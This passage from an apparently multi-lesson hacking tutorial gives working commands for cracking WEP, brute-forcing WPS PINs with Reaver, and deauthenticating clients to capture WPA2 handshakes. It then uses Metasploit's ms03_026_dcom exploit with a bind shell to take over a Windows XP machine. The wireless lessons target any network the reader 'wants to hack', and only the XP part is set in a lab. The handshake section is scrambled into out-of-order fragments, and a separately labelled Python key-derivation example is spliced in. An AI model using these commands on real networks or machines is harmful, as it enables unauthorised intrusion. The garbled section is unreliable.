(Puts your wireless adapter in monitor mode.) Then we will use airodump-ng mon0 to see the list of networks in range. Airodump-ng lists the networks in range. See the one you want to hack. Make a note of the BSSID of the network you want to hack. A good practice is to store all the information gathered in any text editor. You should gather the equivalent information for the network you will be working on. Then just change the values whenever I use them in any of the commands. Now we will hack the digisol network. Now, take a note of following:-
- ESSID - DIGISOL
- BSSID - 00:17:7C:22:CB:80
- CH (channel) - 2
- Mac address of genuine users connected to the network:
- Interface : wlan1 - referred to as mon0

Note : We need at least one user (wired or wireless) connected to the network and using it actively. The reason is that this tutorial depends on receiving at least one ARP request packet and if there are no active clients then there will never be any ARP request packets.

Now to test the network, type the following code-

aireplay-ng --test -e DIGISOL -a 00:17:7C:22:CB:80 mon0

The last time we checked whether the wireless card had the capability to inject packets. We tested it on our own computer. This time, we actually injected packets into the target computer. The last line 30/30 : 100% determines how good the strength of the signal is. A very high percentage is a good sign, and 100 is ideal. If this worked, then it's pretty good news, and it means that you are most probably going to be able to hack this network.

Capture Packets

Now we have already run airodump-ng a couple of times, to check whether the signal strength will be sufficient. Now, we will simply execute the following code-

airodump-ng [interface] -c [channel]
airodump-ng mon0 -c 2

This will make the wireless card only read packets in the channel no. 2, on which our target network is. This time, we should pass the -w command which will instruct airodump-ng to save the output to a file.

airodump-ng -c [channel] --bssid [bssid] -w [file_name] [interface]
airodump-ng -c 2 --bssid 00:17:7C:22:CB:80 -w dump mon0

Now the output will be saved in a file dump-01.cap. Now we can keep this terminal running and it will keep saving the packets. [In the previous tutorial we did only 2 things, i.e. this step, and the step we are going to do last, i.e. crack it. While it makes our work easier to just follow two steps, it also makes the process much more time consuming, since we are simply a passive packet listener, who is not doing anything]

Speeding Things Up

Fake Authentication

Now to speed things up, we will inject the network. Now to make the AP pay attention to your injected packets, you either have to be a connected client, or have to pretend to be one. You can either mask your mac address to one of the already connected clients, or use the fake authentication feature. We will do the latter. (If you see an error like the AP is on channel x and mon0 is on channel y then go to the bottom of the post for troubleshooting)

aireplay-ng -1 0 -e DIGISOL -a 00:17:7C:22:CB:80 mon0

Authenticated and capturing packets.

ARP request replay mode

ARP packets are your best bet at getting a lot of IVs or data. Without IVs you can't hack a network. As soon as we have 10000 data packets, we can start attempting to get the password using aircrack-ng. This is the real speeding step. Now this is the part where an active user on the network is absolutely necessary. Enter the following code to make aireplay-ng listen to the AP for ARP packets, and inject them as soon as they find one.

aireplay-ng -3 -b [BSSID] mon0

This is what the final code will look like-

aireplay-ng -3 -b 00:17:7C:22:CB:80 mon0

This is what it'll look like in the beginning. Now you'll have to wait for some time till it gets an ARP request. As soon as it gets one, the terminal will sort of explode. We will thus obtain ARP packets, capture the packet, and inject them. This will create a lot of data very fast. These packets will fill up the data column of our airodump-ng capture, and data is what will help us obtain the password. And the data packets will start filling in with Godspeed. [Screenshots: Slow start. Everything got fine after some time. After some time I had enough packets to crack almost any network. The data filled in VERY fast.] The video shows how fast the IVs flowed in after ARP injection started.

Cracking the network

Cracking the network is as easy as typing the following into the console

aircrack-ng name_of_file-01.cap

In our case, the command will be

aircrack-ng dump-01.cap

After pressing enter, you will have a list of networks and you'll be prompted to select which one of them to hack. In my case there was just one network, so I couldn't get that screen or a screenshot. The password was cracked in less than a second. I have blurred out the password and some random stuff. So finally you have obtained the password of the network you were trying to hack.

Troubleshooting

A person commented on another wireless hacking post. This is the problem he faced.

"whenever I try to use aireplay-ng, with the options, it always fails saying that mon0 is in channel -1 and the target is in other channel. How can I fix this? I looked a lot for a real answer but nobody knows what this is."

This is a possible solution. Okay, try the following-
1) When you start the monitor mode, specify the channel - usage: airmon-ng [channel or frequency]. Your code :
airmon-ng start wlan0 6
Substitute 6 with the required channel.
2) While starting airodump, specify the channel
airodump-ng mon0 -c 6

I was facing this problem when my mon0 kept hopping from one channel to the other, and the second step alone solved my problem. If your airmon-ng assigns itself a fixed channel on its own will, without you even specifying it, then the problem might be more complicated. If the above steps don't solve the problem, take a look here.

http://ubuntuforums.org/showthread.php?t=1598930

Lesson 18: Hack WPA with WPS enabled

Hack WPA/WPA2 WPS - Reaver - Kali Linux

WPA/WPA-2

When it was known that a WEP network could be hacked by any kid with a laptop and a network connection (using easy peasy tutorials like those on our blog), the security guys did succeed in making a much more robust security measure WPA/WPA2. Now hacking WPA/WPA2 is a very tedious job in most cases. A dictionary attack may take days, and still might not succeed. Also, good dictionaries are huge. An exhaustive bruteforce including all the alphabets (uppercase lowercase) and numbers may take years, depending on password length. Rainbow tables are known to speed things up, by completing a part of the guessing job beforehand, but the output rainbow table that needs to be downloaded from the net is disastrously large (can be 100s of GBs sometimes). And finally the security folks were at peace. But it was not over yet, as the new WPA technology was not at all easy for the users to configure. With this in mind, a new security measure was introduced to complement WPA: Wifi Protected Setup (WPS). Now basically it was meant to make WPA even tougher to crack, and much easier to configure (push a button on router and device connects). However, it had a hole, which is now well known, and tools like reaver can exploit it in a single line statement. It still might take hours, but it is much better than the previous scenario in which months of brute-forcing would yield no result. Here's what wikipedia says about WPS-

"Created by the Wi-Fi Alliance and introduced in 2006, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long passphrases. Prior to the standard, several competing solutions were developed by different vendors to address the same need. A major security flaw was revealed in December 2011 that affects wireless routers with the WPS feature, which most recent models have enabled by default. The flaw allows a remote attacker to recover the WPS PIN in a few hours with a brute-force attack and, with the WPS PIN, the network's WPA/WPA2 pre-shared key. Users have been urged to turn off the WPS feature, although this may not be possible on some router models."

Working Of WPS

Now while most of the things are the same as in WPA, there is a new concept of using pins for authentication. So basically, the client sends 8 digit pins to the access point, which verifies it and then allows the client to connect. Now a pin has 8 digits, and only contains numbers, so its a possible target for bruteforce. Under normal bruteforcing of WPA passwords, you have to consider the fact that there may be numbers, alphabets, and sometimes symbols (and more than 8 letters). This makes the task a billion billion times tougher. However, we can try thousands of keys per second. Basically, the assumption is that bruteforcing will take place at a key per second: 8 digits and 10 possibilities per digit (0-9) make it 10^8 (interpret ^ as raised to the power of) seconds if we assume one key per second. Now that'll be years. So, where is this taking us? The answer is, there are flaws in this technology that can be used against it, which make it a tad bit easier.
- The 8th digit is a checksum of first 7 digits, i.e. 10^7 possibilities, one-tenth time. Two months, still a way to go.
- The pin number for verification goes in two halves, so we can independently verify the first four and the last four digits. And believe me, its easy to guess 4 digits correct two times, than to guess 8 correct digits at once. Basically, the first half would take 10^4 guesses and the second would take 10^3. Now the guesses would be 10^4 + 10^3 (not 10^4 * 10^3). Now we need 11,000 guesses. And that's all the combinations, and most probably the correct pin will not be the last combination, so you can expect to reach the result earlier. So that'll take 3 hours approximately. However, there is a delay because we have to wait for APs response, and we may only try a few keys per second (practically the best I've seen on my PC is 1 key per 2 sec).

How to carry out the attack

Now it might have been tough to carry out this attack at some point in history, but now, its a breeze. If you have all the prerequisites, then hacking the network would be as easy as

reaver -i <interface-name> -b <BSSID of target>

And if you are already familiar with hacking WEP, then just go to your Kali Linux terminal and type the above command (replacing what needs to be replaced). Leave your machine as is, come back 10 mins later, check the progress (must be 1% or something), and go take a nap. My personal best is a key every 2 seconds, and yours might drop to as low as a key every 10 seconds. However, if you're a newbie, then tag along.

Kali Linux

First off, you need to have Kali linux (or backtrack) up and running on your machine. Any other Linux distro might work, but you'll need to install Reaver on your own. If not, then you'll have to do some homework, and you might have to do a live boot using live CD or live USB of Kali Linux. (Reaver has a known issue : Sometimes it doesn't work with Virtual Machines. See the last section of this post on troubleshooting by scrolling down a bit)

Information Gathering

Now you need to find out the following about your target network-
- Does it have WPS enabled. If not, then the attack will not work.
- The BSSID of the network.

Now to check whether the network has WPS enabled or not, you can either use wash or just use the good old airodump-ng. Wash is specifically meant to check whether a network has WPS enabled or not, and thereby is much easier to use. Here are the steps-
- Set your wireless interface in monitor mode-
  airmon-ng start wlan0
- Use wash (easy but sometimes unable to detect networks even when they have wps enabled).
  wash -i mon0
  This will show all the networks with WPS enabled. If any network shows up there, it has WPS enabled. [Screenshot: None of them has WPS enabled. This is an error which I haven't figured out yet.] Update : wash -i mon0 --ignore-fcs might solve the issue. If you see it, try that, or move on to airodump method.
- Use airodump-ng.
  airodump-ng mon0
  It will show all networks around you. It tells which of them use WPA. You'll have to assume they have WPS, and then move to next steps.

Reaver

Now finally we are going to use Reaver to get the password of the WPA/WPA2 network. Now irrespective of what you used, you should have a BSSID column in the result that you get. Copy the BSSID of the network you want to hack. Keep this copied, as you'll need it. So by now you must have something like XX:XX:XX:XX:XX:XX, which is the BSSID of your target network. Remember creating a monitor interface mon0 using airmon-ng start wlan0. This is what we are using. That's all the information you need. This is all the information that Reaver needs to get started, and all you need to do is enter-

reaver -i mon0 -b XX:XX:XX:XX:XX:XX

Explanation = -i : interface used. -b specifies the BSSID of the network that we found out earlier. Reaver comes with many advanced options, and some are recommended by me. Most importantly, you should use the -vv option, which increases the verbosity of the tool. Basically, it writes everything thats going on to the terminal. This helps you see whats happening, track the progress, and if needed, do some troubleshooting. So final command should be-

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv

After some hours, you will see something like this. The pin in this case was intentionally 12345670, so it was hacked in 3 seconds. Reaver makes hacking very easy, just saying.

Troubleshooting

Here is an extra section, which might prove useful (or more like consoling, to let you know you are not the only one who is having troubles).

Known problems that are faced -
1. As in the pic above, you saw the first line read "Switching wlan0 to channel 6" (Yours will be mon0 instead of wlan0). Sometimes, it keeps switching interfaces forever. (see pictures below)
2. Sometimes it never gets a beacon frame, and gets stuck in the waiting for beacon frame stage.
3. Sometimes it never associates with the target AP.
4. Sometimes the response is too slow, or never comes, and a (0x02) or something error is displayed.

Basically, such errors suggest-
1. Something wrong with wireless card.
2. AP is very choosy, won't let you associate.
3. The AP does not use WPS.
4. You are very far from the AP.

Possible workarounds-
1. Kill 'em all. In most cases, killing naughty processes helps. [Screenshot: processes causing problems]
2. Move closer to target AP.
3. Do a fakeauth using aireplay-ng (Check speeding up WEP hacking) and tell Reaver not to bother as we are already associated using -A (just add -A at the end of your normal reaver code)
4. It does not work well inside Virtual machines. It is recommended that you do a live boot. If you are using Kali Linux in Vmware, try booting into Kali using USB. In my case, booting up from USB and using internal adapter increased the signal strength and speeded up the bruteforce. I don't know why, but sometimes internal adapters work wonders. Update : It has nothing to do with internal adapter. I have verified my observation with various hackers, and it is now a known problem with Reaver, and can't be used from inside of a VM.

Lesson 19: Hack WPA-2 PSK Capture Handshake

Hack WPA-2 PSK Capturing the Handshake

WPA password hacking

Okay, so hacking WPA-2 PSK involves 2 main steps-
1. Getting a handshake (it contains the hash of password, i.e. encrypted password)
2. Cracking the hash.

Now the first step is conceptually easy. What you need is you, the attacker, a client who'll connect to the wireless network, and the wireless access point. What happens is when the client and access point communicate in order to authenticate the client, they have a 4 way handshake that we can capture. This handshake has the hash of the password. Now there's no direct way of getting the password out of the hash, and thus hashing is a robust protection method. But there is one thing we can do. We can take all possible passwords that can exist, and convert them to hash. Then we'll match the hash we created with the one that's there in the handshake. Now if the hashes match, we know what plain text password gave rise to the hash, thus we know the password. If the process sounds really time consuming to you, then its because it is. WPA hacking (and hash cracking in general) is a pretty resource intensive and time taking process. Now there are various different ways cracking of WPA can be done. But since WPA is a long shot, we shall first look at the process of capturing a handshake. We will also see what problems one can face during the process (I'll face the problems for you). Also, before that, some optional wikipedia theory on what a 4-way handshake really is (you don't want to become a script kiddie do you?)

The Four-Way Handshake

The authentication process leaves two considerations: the access point (AP) still needs to authenticate itself to the client station (STA), and keys to encrypt the traffic need to be derived. The earlier EAP exchange or WPA2-PSK has provided the shared secret key PMK (Pairwise Master Key). This key is, however, designed to last the entire session and should be exposed as little as possible. Therefore the four-way handshake is used to establish another key called the PTK (Pairwise Transient Key). The PTK is generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA nonce (SNonce). The actual messages exchanged during the handshake are depicted in the figure and explained below:
1. The AP sends a nonce-value to the STA (ANonce). The client now has all the attributes to construct the PTK.
2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication.
3. The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame.
4. The STA sends a confirmation to the AP.

All the above messages are sent as EAPOL-Key frames.

16 bytes of EAPOL-Key Confirmation Key (KCK) – Used to compute MIC on WPA EAPOL Key message.
AP uses this key to encrypt additional data sent (in the 'Key Data' field) to the client (for example,
AP MAC address. the RSN IE or the GTK) 3. and STA MAC address. which is really a Message Authentication and Integrity Code: (MAIC). The product is then put through PBKDF2-SHA1 as the cryptographic hash function. so that the receiving STA can perform basic replay detection. As soon as the PTK is obtained it is divided into five separate keys: PTK (Pairwise Transient Key – 64 bytes) 1. used to decrypt multicast and broadcast traffic. 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets . 16 bytes of EAPOL-Key Encryption Key (KEK) . 2. The handshake also yields the GTK (Group Temporal Key). 4. 3. The AP sends a nonce-value to the STA (ANonce). Now if your clients are very far from you. By the way. please get off this connection request) won't reach them. I have my cellphone creating a wireless network named 'me' protected with wpa-2. Airodump-ng (easy but not automatic. and in case of airodump- ng. Wifite (easy and automatic) 2. Your network card is good at receiving packets. 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on unicast data packets transmitted by the station The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used if the network is using TKIP to encrypt the data. 4. if you didn't understand much of it then don't worry. I will (such a good guy I am :) ). but wifite does all this crap for you. There's a reason why people don't search for hacking tutorials on Wikipedia (half the stuff goes above the head) Capturing The Handshake Now there are several (only 2 listed here) ways of capturing the handshake. you could either sit there and wait till a new client shows up and connects to the WPA network. Now the methodology is same for wifite and airodump-ng method. Get the handshake with wifite Now my configuration here is quite simple. Okay enough theory. 
and you'll keep wondering why you aren't getting any handshake (the same kind of problem is faced during ARP injection and other kind of attacks too). Now you need to realize that for a handshake to be captured. and when they connect back. but not as good in creating them. you'll have to call a brethren (airreply-ng) to your rescue.e. there needs to be a handshake. So. the idea is to be as close to the access point (router) and the clients as possible. Now currently no one is connected to the . Now while other tutorials don't mention this. you manually have to do what wifite did on its own) Wifite Methodology We'll go with the easy one first. We'll look at them one by one- 1. 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on unicast data packets transmitted by the AP 5. you capture their handshake. your deauth requests (i. or you can force the already connected clients to disconnect. Now there are 2 options. :' / \ [+] scanning for wireless devices. . This is an added bonus.. /___\ . me..----. /_____\ .' . root@kali:~# wifite .. `. CTRL+C when ready. But I pressed ctrl+c and it tried to capture the handshake.. ':.e.. Lets try and see what wifite can do. It has almost 100% success rate. and would have given us the password had I waited for 2-3 hours. or 'all': Now I selected the first target..' `.-. done [+] initializing scan (mon0).. :: :: : ( ) : :: :: automated wireless auditor ':. First it tried the PIN guessing attack.------ 1 me 1 WPA2 57db wps 2 ******* 11 WEP 21db no client 3 ************** 11 WEP 21db no Now as you can see. As expected.:' designed for Linux ':.:' ':.:' . [+] enabling monitor mode on wlan0. 0 targets and 0 clients found [+] scanning (mon0).. updates at 5 sec intervals.' . Also. and then pressd ctrl+c. I waited for 10-20 secs.. wifite will use reaver too to skip the whole WPA cracking process and use a WPS flaw instead.:' . i.---.:' .. Here's what happened. WiFite v2 (r85) .. it had two attacks in store for us. `..' `..' . 
NUM ESSID CH ENCR POWER WPS? CLIENT --. .. CTRL+C when ready. No client was there so no handshake could be captured.-------------------.. updates at 5 sec intervals.' `. reaver can save you from all the trouble..network. I pressed ctrl+c and wifite asked me which target to attack (the network has wps enabled.---. my network showed up as 'me'. `.. ':. in this tutorial we'll forget that this network has WPS and capture the handshake instead) [+] select target numbers (1-3) separated by commas. ':. /_\ . [0:00:04] scanning wireless networks. Lets do it again.. (^C) WPA handshake capture interrupted [+] 2 attacks completed: [+] 0/2 WPA attacks succeeded [+] quitting Now the deauth attacks weren't working.[+] 1 target selected. Lets see what happens this time around..---.---.------ 1 * 1 WPA 99db no client 2 me 1 WPA2 47db wps client 3 * 11 WEP 22db no clients 4 * 11 WEP 20db no [+] select target numbers (1-4) separated by commas. This time I increased the deauth frequency. (^C) WPS brute-force attack interrupted [0:08:20] starting wpa handshake capture on "me" [0:07:51] listening for handshake. and wifite will de-authenticate it.. 0/0 success/ttl. done [+] quitting Now I connected my other PC to 'me'.. 0/0 success/ttl. (^C) WPS brute-force attack interrupted [0:08:20] starting wpa handshake capture on "me" [0:08:05] listening for handshake. This time a client will show up.-. root@kali:~# wifite -wpadt 1 . [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED) ^C0:00:07] WPS attack.-------------------. or 'all': 2 [+] 1 target selected.. NUM ESSID CH ENCR POWER WPS? CLIENT --. [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED) ^C0:00:24] WPS attack. and it'll try to connect again. (^C) WPA handshake capture interrupted [+] 2 attacks completed: [+] 0/2 WPA attacks succeeded [+] disabling monitor mode on mon0..----. :' .' .' `. however.' . /_____\ .-. WiFite v2 (r85) . [+] 1 target selected.. 
finally.-------------------..:' / \ [+] scanning for wireless devices.. 0/0 success/ttl.----. This will solve the problems for us. /_\ . ':. wlan0 Atheros ath9k . Now look at wifite output NUM ESSID CH ENCR POWER WPS? CLIENT --. So time to bring my external card to the scene. This time....' .------ 1 me 1 WPA2 44db wps client 2 * 11 WEP 16db no client 3 * 11 WEP 16db no [+] select target numbers (1-3) separated by commas. . ':.' `.Soon. :: :: : ( ) : :: :: automated wireless auditor ':. (^C) WPS brute-force attack interrupted [0:08:20] starting wpa handshake capture on "me" [0:07:23] listening for handshake.[phy1] 2. `.:' designed for Linux ':. .. `..' `.---.[phy0] [+] select number of device to put into monitor mode (1-2): See.. I captured a handshake. ':..:' ':. that the problem was that I was using my internal card (Kali Live USB). root@kali:~# wifite . I realized.. [+] available wireless devices: 1.:' ..---.. so deauth wasn't working. wlan1 Ralink RT2870/3070 rt2800usb . [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED) ^C0:00:01] WPS attack. `.. It does not support packet injection... or 'all': Now I attack the target.:' . /___\ . we can use the USB card now. This time I won't show you the problems you might run into. one every 10 secs is defualt).ethernet  wlan ... Now.hccap). then you are missing a lot of things. Capturing Handshake with Airodump-ng Now if you skipped everything and got right here. I'll end this pretty quick. Let's see how to do the same thing with airodump-ng. . Now the captured handshake was saved as a . pyrit. all the problems were seen in wifite case. [0:00:57] handshake captured! saved as "hs/me_02-73-8D-**-**-**. Alright. (If you are not a newbie. See the result.kalitutorials. etc. I'm copying stuff from http://www. now. you need to know its name. hashcat (after converting . as the wifite thing was quite detailed.loopback.  eth . It'll be a perfect ride. done [+] quitting As you can see. so to scan one. 
Find out the name of your wireless adapter. to see all the adapters. skip to the point where you see red text) 1. We'll use Wifite only to capture the handshake. it took me 57 seconds to capture the handshake (5 deauth requests were sent. Note the suffix associated.net/2013/08/wifi-hacking-wep.This is what we want. using either a wordlist or bruteforce. your computer has many network adapters. So there are basically the following things that you need to know-  lo . Note down the wlan(0/1/2) adapter.html where I already discussed airodump-ng.cap" [+] 2 attacks completed: [+] 1/2 WPA attacks succeeded me (02:73:8D:37:A7:ED) handshake captured saved as hs/me_02-73-8D-**-**-**. The no dictionary error shouldn't bother you.cap [+] starting WPA cracker on 1 handshake [!] no WPA dictionary found! use -dict <file> command-line argument [+] disabling monitor mode on mon0. Not important currently. type ifconfig on a terminal.cap file which can be cracked using aircrack. we use a tool called airmon-ng to create a virtual interface called mon.Trouble with the wlan interface not showing up. Enable Monitor mode Now. You should try booting Kali using Live USB (just look at the first part of this tutorial). 2. or buy an external card. . This is because virtual machines can't use internal wireless cards and you will have to use external cards. Just type airmon-ng start wlan0 Your mon0 interface will be created. This tool gathers data from the wireless packets in the air. Start capturing packets Now. You'll see the name of the wifi you want to hack.3. airodump-ng mon0 . we'll use airodump-ng to capture the packets in the air. Store the captured packets in a file This can be achieved by giving some more parameters with the airodump command airodump-ng mon0 --write name_of_file .4. -a will required BSSID and replace BSSID here with your target BSSID. then fix mon0 on a channel using- root@kali:~# airodump-ng mon0 -w anynamehere -c 1 Replace 1 with the channel where your target AP is. 
mon0 is the interface you created. or problem with beacon frame. In case you face problems with the monitor mode hopping from one channel to another. (It's a bug with aircrack-ng suite). 0 tell it to fire it at interval of 0 secs (very fast so run it only for a few secs and press ctrl+c). you'll see that at the top right it says WPA handshake captured . You might also need to add -- ignore-negative-one if aireplay demands it. Here is what it looks like . In my case airodump-ng says fixed channel mon0: -1 so this was required.Non newbies- root@kali:~# airmon-ng start wlan1 root@kali:~# airodump-ng mon0 -w anynamehere Now copy the bssid field of your target network (from airodump-ng ng screen)and launch a deauth attack with aireplay-ng root@kali:~# aireplay-ng --deauth 0 -a BSSID here mon0 The --deauth tells aireplay to launch a deauth attack. Now when you look at the airodump-ng screen. cap Read 212 packets.CH 1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: ** BSSID PWR RXQ Beacons #Data.1 742 82 me * * -35 0e. Its been a long one.cap Opening anynamehere-01.1 0 26 You can confirm it by typing the following root@kali:~# aircrack-ng anynamehere-01. # BSSID ESSID Encryption 1 ************** me WPA (1 handshake) 2 ** Unknown Happy cracking. Hope it helped you. all that needs to be done in this tutorial has been done. . #/s CH MB ENC CIPHER AUTH ESSID 02:73:8D:37:A7:ED -47 75 201 35 0 1 54e WPA2 CCMP PSK me BSSID STATION PWR Rate Lost Frames Probe * * 0 0e. but we can definitely hack an unpatched Windows XP machine. Virtual Machines   Windows XP . I'm gonna teach you penetration testing the way I learnt it. Testing this method on someone else's computer is not recommended and is quite illegal. However. It is strongly advised to create your own virtual machine and test exploits there. installing XP on a VM will be a piece of cake.Hacking XP Our approach to penetration testing is going to be simple. By doing actual penetration and exploitation. 
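The four-way handshake theory in Lesson 19 above describes the key derivation only in words, and the Wikipedia quote compresses two different steps into one. Here is an added worked example of the derivation as IEEE 802.11i actually specifies it; this is my code, not the tutorial's and not part of aircrack-ng or wifite. PBKDF2-HMAC-SHA1 over the passphrase, with the SSID as salt, 4096 iterations and a 32-byte output, produces the PMK; a separate HMAC-SHA1 based PRF then expands PMK, ANonce, SNonce and the two MAC addresses into the 64-byte PTK that is split into the five keys listed in the lesson. The passphrase "password" with SSID "IEEE" is the published test vector from the standard; the AP MAC is the BSSID of the 'me' network from the wifite output above, while the station MAC and the two nonces are constructed values.

```python
import hashlib
import hmac

# Added example (not code from the tutorial, aircrack-ng or wifite).
# Key hierarchy per IEEE 802.11i for a WPA2-PSK network:
#   PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes)
#   PTK = PRF-512(PMK, "Pairwise key expansion",
#                 min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
#   PTK is then split into KCK | KEK | TK | MIC-Tx | MIC-Rx (16+16+16+8+8 bytes).

PBKDF2_ITERATIONS = 4096
PMK_LEN = 32
PTK_LEN = 64
PTK_LABEL = b"Pairwise key expansion"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK (the 'PSK') from the human passphrase and the network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def prf(key: bytes, label: bytes, data: bytes, out_len: int) -> bytes:
    """802.11i PRF-n: R = R || HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < out_len:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:out_len]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the four public handshake values (nonces and MACs)."""
    if len(ap_mac) != 6 or len(sta_mac) != 6 or len(anonce) != 32 or len(snonce) != 32:
        raise ValueError("MAC addresses must be 6 bytes and nonces 32 bytes")
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, PTK_LABEL, data, PTK_LEN)


def split_ptk(ptk: bytes) -> dict:
    """The five sub-keys named in the lesson; the two Michael keys are only used by TKIP."""
    return {
        "KCK": ptk[0:16],      # EAPOL-Key Confirmation Key: MIC on handshake messages
        "KEK": ptk[16:32],     # EAPOL-Key Encryption Key: wraps the GTK in message 3
        "TK": ptk[32:48],      # Temporal Key: unicast data encryption
        "MIC_TX": ptk[48:56],  # Michael key, AP -> STA (TKIP only)
        "MIC_RX": ptk[56:64],  # Michael key, STA -> AP (TKIP only)
    }


def pbkdf2_hmac_calls() -> int:
    """HMAC-SHA1 evaluations spent on one passphrase guess: one block per 20 bytes of output."""
    blocks = -(-PMK_LEN // hashlib.sha1().digest_size)
    return blocks * PBKDF2_ITERATIONS


# Constructed demo inputs. The AP MAC is the BSSID of the 'me' network from the
# wifite output above; the station MAC and both nonces are made-up values.
AP_MAC = bytes.fromhex("02738d37a7ed")
STA_MAC = bytes.fromhex("001122334455")   # constructed
ANONCE = bytes(range(0, 32))               # constructed
SNONCE = bytes(range(32, 64))              # constructed

if __name__ == "__main__":
    pmk = derive_pmk("password", "IEEE")   # published test vector from IEEE 802.11
    print("PMK:", pmk.hex())
    keys = split_ptk(derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE))
    for name, value in keys.items():
        print(f"{name:6} {value.hex()}")
    print("HMAC-SHA1 calls per guess:", pbkdf2_hmac_calls())
```

The derivation is symmetric in the AP and STA inputs because the PRF input sorts them, so both sides arrive at the same PTK from the values that travel in clear in the handshake. Note the cost: each passphrase guess costs 8192 HMAC-SHA1 evaluations (4096 iterations for each of the two 20-byte PBKDF2 blocks) before the handshake MIC can even be checked, which is why the "cracking the hash" step is slow and why a long random passphrase, rather than a hidden SSID or MAC filtering, is the real defence for a PSK network.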
Lesson 20: Hacking Windows XP - Penetration Testing

We can't hack completely patched Windows 7 or Windows 8 right now. I already made a post about the ideal way to begin penetration testing. But we aren't going the ideal way. To do that, firstly, you need a victim machine (a few screenshots of the process).

A look at Metasploit Framework

Starting the framework

"In keeping with the Kali Linux Network Services Policy, there are no network services, including database services, running on boot so there are a couple of steps that need to be taken in order to get Metasploit up and running with database support."

Simply speaking, there are some services that metasploit needs which aren't started with system startup. So here are some commands you need to execute on your console before you can start metasploit:

    service postgresql start

(Metasploit uses PostgreSQL as its database so it needs to be launched first.) With PostgreSQL up and running, we next need to launch the metasploit service. The first time the service is launched, it will create a msf3 database user and a database called msf3. The service will also launch the Metasploit RPC and Web servers it requires.

    service metasploit start

Now finally we are ready to start metasploit framework.

    msfconsole

Looking at the targets

Right now, there is a Windows XP SP3 virtual machine running side by side with my Kali. Simply speaking, my metasploit framework is running on Kali on VMware on a Windows 8 machine. Go to your XP virtual machine (the one you are trying to hack). Open command prompt and type ipconfig. In the results, check the IP of the machine. In my case the IP is 192.168.63.131. Now go back to your Kali machine.

Port Scan

Metasploit offers an awesome port scanning function which goes by the name auxiliary scanner. Here is the command to execute this scan. To use this feature, enter the following code:

    use auxiliary/scanner/portscan/tcp

Type show options to see the available options:

    show options

Now we have to change a few settings. Firstly, we have to specify a target IP to scan. Now this is a bit tricky, as the IP is not going to be the same in all cases. So here's what you'll do: the IP you noted from ipconfig on the XP machine is what you'll have to specify the RHOSTS option as. Secondly, we should reduce the number of ports scanned:

    set ports 1-500

Now type the following (change the IP as required):

    set RHOST 192.168.63.131

Here's what it should look like. There's a slight error here: I spelled RHOSTS wrong. Make sure you add the 's' in the end. Finally, do a show options again to see what all changes you've made. Now we are ready for some action. Type:

    run

The scan will start and after some time it will show you which tcp ports are open and vulnerable to attack. In my case, this basically means that there are no open ports here. If you had not been using an unpatched version of Windows, there will not be any vulnerable ports. Nothing much you can do. However, if you had some good luck there, and had a vulnerable machine, you will have some vulnerable ports. I turned off the firewall on the Windows machine and ran the auxiliary module again. I got 3 open ports this time. If you are using some higher XP version, you too might need to disable the firewall in order to get open ports.

Real life port scan

In an actual pentesting environment, you don't know about the IP, open ports and OS of the target computer. So what we need to do is detect these machines in Metasploit framework. For this we'll do a port scan. In such cases, we can use the Nmap port scanner which is much better than auxiliary. We'll come to that later. In our case, we already know what to do.

Finding Exploits

This step is important. We need to figure out which exploits work on the OS we are attacking. Now we know we have a target at IP 192.168.63.131 and it has ports 135, 139 and 445 open. Type back to get out of the auxiliary scanner. Search for dcom on msfconsole:

    search dcom

This is a very famous exploit for Windows. Copy the exploit number 3. In the next line, type:

    use exploit/windows/dcerpc/ms03_026_dcom

You are now using the most famous Windows exploit (which shows great as rank). Type show options again:

    show options

Again, set the RHOST as 192.168.63.131 (replace with the IP of your target):

    set RHOST 192.168.63.131

Also, set a payload:

    set PAYLOAD windows/shell_bind_tcp

And here's the best part:

    exploit

You have now successfully broken into the target computer. You have an open shell on the target computer with administrator privileges. In short, you own that computer now. Try out what all you can do from here on. I'll come up with more in the next tutorial. We have a pentesting lab now and have successfully exploited an XP machine.

Lesson 21: Metasploitable 2

Metasploitable 2 Linux - Most Vulnerable OS in the town: Introduction and Installation

What is Metasploitable 2

[Quoted from Rapid7] The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. By default, Metasploitable's network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network.

Download and install Metasploitable Linux

Firstly, I'd list some requirements:
1. 10 to 30 GB disk space for Metasploitable (Kali would need a similar amount of disk space).
2. 1GB RAM for Metasploitable (a total of 4GB would be great: 1GB for Kali, 1GB for Metasploit, and 2GB will keep your host OS running).
